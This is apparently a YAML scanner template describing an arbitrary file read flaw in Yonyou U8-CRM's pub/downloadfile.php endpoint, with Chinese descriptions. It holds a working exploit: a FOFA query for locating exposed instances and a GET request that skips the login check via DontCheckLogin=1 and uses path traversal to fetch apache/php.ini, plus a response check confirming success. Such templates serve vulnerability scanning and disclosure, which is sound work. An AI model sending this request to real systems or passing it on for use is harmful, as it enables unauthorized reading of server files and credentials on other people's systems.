product: 用友U8-CRM
vName: 用友U8-CRM pub/downloadfile.php接口任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 用友U8-CRM客户关系管理全面解决方案是基于中国企业最佳营销管理实践，更符合中国企业营销管理特点，客户关系管理的整合营销平台。用友crm pub/downloadfile.php接口存在任意文件读取漏洞
version: ''
note: ''
search:
  FOFA: app="用友U8CRM"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/138342531
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../apache/php.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - About php.ini
            logic: and